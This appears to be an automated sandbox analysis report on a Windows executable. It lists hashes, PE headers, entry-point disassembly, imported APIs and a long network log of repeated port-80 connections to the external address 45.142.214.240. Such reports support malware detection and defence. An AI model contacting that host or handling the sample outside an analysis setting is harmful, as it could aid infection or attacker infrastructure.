                                                                          MD5:f306ea1faa91611b7bc26e9cc0bd3956
                                                                          SHA1:accc3aa32f33273b46765d024c0cb16cc8463486
                                                                          SHA256:ff66d8e75eccb014fd09adc9045bd1630219def9a7635d4a9ac382466eb7f435
                                                                          SHA512:da7398c9b8022b66a038e5c42c90b8ddafdb0b0d1a9a2c466582f4f13b02a90d4e51033cfeba5410ba5def247232192541e7eaafa01102e59370f3ee4c6d1608
                                                                          SSDEEP:49152:32e2wVd44xMOR2voxA14iCOeIVjwpEoC+M3NEPTWmxbX+X3g4gtStO:meLV6rOWgAOirtjYEow3ePSWL+Hg4kwO
                                                                          TLSH:AA9533435A8544BAF121BDF7BAB06A08B4AB6E333279B108390F0CC92D3FA7555DC785
                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                          Icon Hash:2d2e3797b32b2b99
                                                                          Entrypoint:0x409b24
                                                                          Entrypoint Section:CODE
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:1
                                                                          OS Version Minor:0
                                                                          File Version Major:1
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:1
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          add esp, FFFFFFC4h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          xor eax, eax
                                                                          mov dword ptr [ebp-10h], eax
                                                                          mov dword ptr [ebp-24h], eax
                                                                          call 00007F4EA0E23B37h
                                                                          call 00007F4EA0E24D3Eh
                                                                          call 00007F4EA0E26F69h
                                                                          call 00007F4EA0E26FB0h
                                                                          call 00007F4EA0E298A3h
                                                                          call 00007F4EA0E29A0Ah
                                                                          xor eax, eax
                                                                          push ebp
                                                                          push 0040A1DBh
                                                                          push dword ptr fs:[eax]
                                                                          mov dword ptr fs:[eax], esp
                                                                          xor edx, edx
                                                                          push ebp
                                                                          push 0040A1A4h
                                                                          push dword ptr fs:[edx]
                                                                          mov dword ptr fs:[edx], esp
                                                                          mov eax, dword ptr [0040C014h]
                                                                          call 00007F4EA0E2A430h
                                                                          call 00007F4EA0E29F97h
                                                                          lea edx, dword ptr [ebp-10h]
                                                                          xor eax, eax
                                                                          call 00007F4EA0E27599h
                                                                          mov edx, dword ptr [ebp-10h]
                                                                          mov eax, 0040CDE4h
                                                                          call 00007F4EA0E23BE8h
                                                                          push 00000002h
                                                                          push 00000000h
                                                                          push 00000001h
                                                                          mov ecx, dword ptr [0040CDE4h]
                                                                          mov dl, 01h
                                                                          mov eax, 004072ECh
                                                                          call 00007F4EA0E27E28h
                                                                          mov dword ptr [0040CDE8h], eax
                                                                          xor edx, edx
                                                                          push ebp
                                                                          push 0040A15Ch
                                                                          push dword ptr fs:[edx]
                                                                          mov dword ptr fs:[edx], esp
                                                                          call 00007F4EA0E2A4A0h
                                                                          mov dword ptr [0040CDF0h], eax
                                                                          mov eax, dword ptr [0040CDF0h]
                                                                          cmp dword ptr [eax+0Ch], 01h
                                                                          jne 00007F4EA0E2A5DAh
                                                                          mov eax, dword ptr [0040CDF0h]
                                                                          mov edx, 00000028h
                                                                          call 00007F4EA0E28229h
                                                                          mov edx, dword ptr [0040CDF0h]
                                                                          cmp eax, dword ptr [edx+00h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9244 | 0x9400 | 00d95da090f9b045cc52199c7b36d118 | False | 0.6099820523648649 | data | 6.529731839731562 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x24c | 0x400 | 39d5f89b5ecafeb0fe902996045df0e7 | False | 0.3076171875 | data | 2.734702734719094 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe48 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 3838d4184c8472ffbcdb08caec92e21c | False | 0.32359730113636365 | data | 4.465277888232694 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.2045454545454546
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.2814569536423841
RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands
English | United States
                                                                          Mar 29, 2024 12:09:52.761989117 CET804972145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:52.762087107 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.762234926 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.764368057 CET804972045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:52.764437914 CET4972080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.978826046 CET804972145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.057368994 CET804972145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.057449102 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.170212030 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.170497894 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.388156891 CET804972245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.388274908 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.388422012 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.399872065 CET804972145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.400021076 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.606055021 CET804972245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.693662882 CET804972245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.693747997 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.810852051 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.811131954 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.029504061 CET804972245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.029598951 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.033225060 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.033298969 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.033443928 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.255656958 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.343990088 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.344059944 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.451755047 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.673973083 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.752840042 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.752897978 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.873255968 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.873538971 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.095577002 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.095669031 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.106574059 CET804972445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.106677055 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.106878996 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.328385115 CET804972445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.416470051 CET804972445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.416733027 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.529854059 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.530236006 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.746736050 CET804972545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.746927023 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.746984959 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.748971939 CET804972445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.749047041 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.963228941 CET804972545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.042346954 CET804972545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.042440891 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.170717001 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.171078920 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.394764900 CET804972545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.394954920 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.395085096 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.395160913 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.395343065 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.612833023 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.701100111 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.701188087 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.811413050 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.029048920 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.108319044 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.108494997 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.218725920 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.436541080 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.524729013 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.524833918 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.639239073 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.639602900 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.856870890 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.857044935 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.861933947 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.862031937 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.862262964 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.084722042 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.170133114 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.170341969 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.280004025 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.503022909 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.582115889 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.582199097 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.701783895 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.702478886 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.918992043 CET804972845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.919095993 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.919317007 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.924187899 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.924257040 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.135596991 CET804972845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.228439093 CET804972845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.228524923 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.341824055 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.342129946 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.558181047 CET804972845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.558273077 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.564382076 CET804972945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.564472914 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.565418959 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.787991047 CET804972945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.866986990 CET804972945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.867069960 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.982947111 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.983247042 CET4973080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.203130007 CET804973045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:00.203228951 CET4973080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.203382969 CET4973080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.205538988 CET804972945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:00.205596924 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.422928095 CET804973045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:00.509139061 CET804973045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:00.509219885 CET4973080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.623573065 CET4973080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.623888969 CET4973180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.843079090 CET804973045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:00.843142033 CET4973080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.843404055 CET804973145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:00.843476057 CET4973180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.843890905 CET4973180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:01.063235044 CET804973145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:01.151525974 CET804973145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:01.151623964 CET4973180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:01.265583038 CET4973180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:01.485122919 CET804973145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:01.564882994 CET804973145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:01.565071106 CET4973180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:01.685792923 CET4973180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:01.685972929 CET4973280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:01.908251047 CET804973245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:01.908448935 CET4973280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:01.908488035 CET4973280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:01.925215960 CET804973145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:01.925278902 CET4973180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:02.131315947 CET804973245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:02.220505953 CET804973245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:02.220566988 CET4973280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:02.326673985 CET4973280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:02.550092936 CET804973245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:02.638163090 CET804973245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:02.638225079 CET4973280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:02.764374971 CET4973280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:02.764709949 CET4973380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:02.986947060 CET804973245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:02.986963034 CET804973345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:02.987029076 CET4973280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:02.987077951 CET4973380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:02.989419937 CET4973380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:03.211868048 CET804973345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:03.301316977 CET804973345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:03.301398993 CET4973380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:03.420104980 CET4973380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:03.420494080 CET4973480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:03.645003080 CET804973445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:03.645020962 CET804973345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:03.645097017 CET4973480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:03.645124912 CET4973380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:03.645339966 CET4973480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:03.866014957 CET804973445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:03.945609093 CET804973445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:03.945727110 CET4973480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.060874939 CET4973480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.061259031 CET4973580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.282700062 CET804973445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:04.282799006 CET4973480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.284161091 CET804973545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:04.284272909 CET4973580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.284502029 CET4973580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.507061958 CET804973545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:04.595429897 CET804973545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:04.595515966 CET4973580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.719572067 CET4973580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.719932079 CET4973680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.939430952 CET804973645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:04.939536095 CET4973680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.939735889 CET4973680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:04.941982031 CET804973545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:04.942039967 CET4973580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:05.159148932 CET804973645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:05.244760990 CET804973645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:05.244915962 CET4973680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:05.374130011 CET4973680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:05.374485970 CET4973780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:05.593514919 CET804973645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:05.593605995 CET4973680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:05.593940020 CET804973745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:05.594012022 CET4973780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:05.594232082 CET4973780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:05.813580990 CET804973745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:05.892684937 CET804973745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:05.892798901 CET4973780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:06.014365911 CET4973780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:06.014734030 CET4973880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:06.231697083 CET804973845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:06.231944084 CET4973880192.168.2.545.142.214.240
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Mar 29, 2024 12:10:06.232199907 CET  49738        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:06.234445095 CET  80           49737      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:06.234514952 CET  49737        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:06.449429035 CET  80           49738      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:06.539088011 CET  80           49738      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:06.539333105 CET  49738        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:06.655518055 CET  49738        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:06.655826092 CET  49739        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:06.871972084 CET  80           49738      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:06.872189045 CET  49738        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:06.876230955 CET  80           49739      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:06.876328945 CET  49739        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:06.876571894 CET  49739        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:07.097358942 CET  80           49739      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:07.185797930 CET  80           49739      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:07.185883045 CET  49739        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:07.300048113 CET  49739        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:07.300338984 CET  49740        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:07.519704103 CET  80           49740      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:07.519824982 CET  49740        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:07.520008087 CET  49740        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:07.520697117 CET  80           49739      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:07.520756006 CET  49739        80         192.168.2.5     45.142.214.240
